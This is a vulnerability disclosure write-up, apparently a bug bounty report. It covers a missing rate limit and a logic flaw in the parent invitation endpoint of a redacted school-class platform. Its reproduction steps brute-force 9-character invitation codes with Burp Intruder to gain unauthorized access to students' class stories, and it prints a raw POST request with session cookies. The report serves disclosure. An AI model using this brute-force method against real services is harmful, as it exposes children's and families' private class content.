***[+] Target will be mentioned as redacted.com for confidential purposes***

# No rate limit + Business Logic Flaw leads to Broken Access Control

## Overview of the Vulnerability
I discovered a bug in the redacted.com platform that allows attackers to invite themselves into any student's class stories without being invited/authorized to do so. Additionally, the API endpoint that is responsible to accept the parents invitation is lack of rate limit protection which allows attacker to conduct a brute force attack on the parent's invitation code.

## Business Impact
Attackers will be able to see class updates, photos, announcements from the student's class, comments on teacher's posts or messages with the teachers that are responsible for the students without being authorized to do so. This compromises the privacy and security of the students, their family and the teachers.

## Steps to Reproduce
Before you proceed, make sure you have registered for a teacher account, create your own class and add students to the class at https://teach.redacted.com. Also, make sure you have registered for a parent account at https://home.redacted.com.

1. Login into your teacher account and navigate to "https://teach.redacted.com/#/classes/{CLASS_ID}/points?editClass=parents". Replace the CLASS_ID with your CLASS_ID.
2. Invite a parent to the class using the "Invite parents" button and check the parent's email and click on the "Join student's class" link.
3. Log in to the parent's account when prompted and intercept the request using Burp Suite proxy. Click on "Forward" until you see a POST request to https://home.redacted.com/api/invitation/{PARENT_CODE}.
4. Send the request to Burp Intruder. Set the payload position on the PARENT_CODE. Load the payloads of generated code with 9 characters of random uppercase and numbers. Change the resource pool to only send 1 request every 1 second following your program guidelines.
5. You will see that there is a lack of rate limit that allows you to send hundreds of request and you should see 200 response if the code matches any PARENT_CODE.

*Step 1-3 is only carried out to show how I came across the API endpoint. You can also craft the POST response to the API endpoint using Postman and make sure to replace the cookie with your parent's account cookies. Refer below request:*
```
POST /api/invitation/PN22N5MNQ HTTP/2
Host: home.redacted.com
Cookie: dojo_log_session_id=9b6331c8-5e04-4153-9065-283a64d982f8; dojo_pubnub_clientId=dojo-107064813; dojo_login.sid=s%3AOQKE1oh8B7G8oSjr83AqqQxbJHR6ULsF.2fUTy5t6A20QISbj6%2BxjheKVX2q9ldIvNOqqiWJJ5S8; dojo_home_login.sid=s:OQKE1oh8B7G8oSjr83AqqQxbJHR6ULsF.2fUTy5t6A20QISbj6+xjheKVX2q9ldIvNOqqiWJJ5S8; dojorrt=1718259838006
Content-Length: 20
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Client-Identifier: Web
X-Client-Version: 202406110412.6018.0-home
X-Sign-Attachment-Urls: true
Sentry-Trace: 66299b90b4f44b08a354a1fcfeae8dfe-9bcb7f3119e50752-0
Baggage: sentry-environment=production,sentry-release=0e430ca5eccbc16b59d392b7a062baec1fc0603f,sentry-public_key=5c51355865402090ed03d41319214223,sentry-trace_id=66299b90b4f44b08a354a1fcfeae8dfe
Content-Length: 20
Origin: https://home.redacted.com
Dnt: 1
Sec-Gpc: 1
Referer: https://home.redacted.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"state":"accepted"}
```
